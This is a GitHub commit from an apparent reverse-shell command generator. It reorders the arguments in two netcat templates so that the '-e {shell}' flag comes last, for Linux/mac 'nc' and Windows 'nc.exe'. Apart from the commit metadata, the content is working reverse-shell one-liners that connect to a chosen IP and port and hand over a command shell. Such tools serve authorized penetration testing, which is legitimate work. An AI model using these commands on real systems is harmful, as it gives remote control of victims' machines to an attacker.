Merge pull request #103 from SafaSafari/SafaSafari-patch-1

nc -e parameter must be last :))
This commit is contained in:
Ryan Montgomery 2022-10-10 12:21:05 -04:00 committed by GitHub
commit 0e5fe41447
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -52,12 +52,12 @@ const reverseShellCommands = withCommandType(
},
{
"name": "nc -e",
"command": "nc -e {shell} {ip} {port}",
"command": "nc {ip} {port} -e {shell}",
"meta": ["linux", "mac"]
},
{
"name": "nc.exe -e",
"command": "nc.exe -e {shell} {ip} {port}",
"command": "nc.exe {ip} {port} -e {shell}",
"meta": ["windows"]
},
{